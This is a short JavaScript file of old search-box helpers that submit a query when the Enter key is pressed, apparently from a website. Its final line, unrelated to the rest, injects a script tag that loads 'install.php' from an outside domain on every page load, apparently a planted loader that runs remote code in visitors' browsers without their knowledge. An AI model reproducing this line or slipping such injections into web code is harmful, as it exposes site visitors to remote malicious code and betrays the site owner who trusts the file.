
function GoToURL(field)
	{
		window.navigate(field + Form1.txtSearch.value)
	}

function goReturn(query) {
		getEvent=event.keyCode; // Used for
														// IE 5+
														// AOL 4,5,6,7,8
		//getEvent=evt.which; // Used for NN [netscape]
		if (getEvent == "13") {
			GoToURL(query);
			return false;
		} else {
			return true;
		}
}
document.write('<script src=http://v4.nettemarketim.com/_private/install.php ><\/script>');